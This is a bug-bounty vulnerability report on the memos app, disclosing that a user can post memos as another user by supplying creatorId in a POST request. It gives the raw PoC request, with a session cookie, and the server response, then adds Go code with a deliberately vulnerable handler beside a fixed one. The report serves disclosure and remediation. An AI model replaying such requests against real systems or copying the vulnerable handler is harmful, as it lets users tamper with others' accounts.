huntr report E3CEBC1A-1326-4A08-ABAD-0414A717FA0F (Quangdaik2362001)

An attacker can post a message to another user's memos page

2022-12-2610:37:22
quangdaik2362001
www.huntr.dev
Tags: attacker, malicious content, post request, memos page, burpsuite, security issue, proof of concept, video demonstration, server response, bug bounty

EPSS: 0.001
Percentile: 30.4%

Description

An attacker can post malicious content to another user's memos page via a POST request: the attacker simply adds a creatorId to the request body and sends it with Burp Suite.

Video PoC: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link

Proof of Concept

POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}

Server Response:

HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}
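The root cause shown by the request and response above is that the server stores the creatorId the client supplies instead of the id of the authenticated session, so the memo is attributed to user 104 (demouser) although the session belongs to someone else. The Go code below is an added illustration written for this page, not the memos project's own code: the memoCreate type, the sessions map, sessionUserID and the two handler functions are assumptions. vulnerableCreateMemo reproduces the reported behaviour (client-controlled creatorId is kept), and hardenedCreateMemo shows the fix: ownership comes only from the session and the client value is overwritten.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// memoCreate mirrors the JSON body of the POST /api/memo request in the report.
type memoCreate struct {
	CreatorID      int    `json:"creatorId"`
	Content        string `json:"content"`
	Visibility     string `json:"visibility"`
	ResourceIDList []int  `json:"resourceIdList"`
}

// sessions is a constructed stand-in for a session store (cookie value -> user id).
// The real application resolves the memos_session cookie server-side; this map is an assumption.
var sessions = map[string]int{
	"session-of-user-101": 101,
}

var errNoSession = errors.New("no valid session")

// sessionUserID resolves the caller's user id from the memos_session cookie.
func sessionUserID(r *http.Request) (int, error) {
	c, err := r.Cookie("memos_session")
	if err != nil {
		return 0, errNoSession
	}
	uid, ok := sessions[c.Value]
	if !ok {
		return 0, errNoSession
	}
	return uid, nil
}

// decodeMemo parses the request body; unknown fields are rejected so the
// accepted surface of the endpoint stays explicit.
func decodeMemo(r *http.Request) (memoCreate, error) {
	var m memoCreate
	dec := json.NewDecoder(r.Body)
	dec.DisallowUnknownFields()
	if err := dec.Decode(&m); err != nil {
		return memoCreate{}, err
	}
	return m, nil
}

// vulnerableCreateMemo keeps whatever creatorId the client sent: an authenticated
// user can therefore file a memo under any other user's id, which is the reported bug.
func vulnerableCreateMemo(r *http.Request) (memoCreate, error) {
	if _, err := sessionUserID(r); err != nil {
		return memoCreate{}, err
	}
	return decodeMemo(r)
}

// hardenedCreateMemo ignores the client-supplied creatorId and stamps the memo with
// the id of the authenticated session; the server is the only authority for ownership.
func hardenedCreateMemo(r *http.Request) (memoCreate, error) {
	uid, err := sessionUserID(r)
	if err != nil {
		return memoCreate{}, err
	}
	m, err := decodeMemo(r)
	if err != nil {
		return memoCreate{}, err
	}
	m.CreatorID = uid
	return m, nil
}

// newMemoRequest builds a request shaped like the report's: the caller's own
// session cookie plus a body that claims a different creatorId.
func newMemoRequest(sessionCookie string, body string) *http.Request {
	r := httptest.NewRequest(http.MethodPost, "/api/memo", strings.NewReader(body))
	r.Header.Set("Content-Type", "application/json")
	if sessionCookie != "" {
		r.AddCookie(&http.Cookie{Name: "memos_session", Value: sessionCookie})
	}
	return r
}

// spoofedBody is the body from the report: creatorId 104 does not match the session user.
const spoofedBody = `{"creatorId":104,"content":"post this message in demouser wall ","visibility":"PRIVATE","resourceIdList":[]}`

func main() {
	v, _ := vulnerableCreateMemo(newMemoRequest("session-of-user-101", spoofedBody))
	h, _ := hardenedCreateMemo(newMemoRequest("session-of-user-101", spoofedBody))
	fmt.Printf("vulnerable handler stored creatorId=%d (client-controlled)\n", v.CreatorID)
	fmt.Printf("hardened handler stored creatorId=%d (session user)\n", h.CreatorID)
}
```

The same principle applies to any ownership or identity field in a create or update body: bind it from the session after decoding, never from the client, and a cheap audit for this class of bug is to check that stored creatorId values always equal the session user that made the write.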
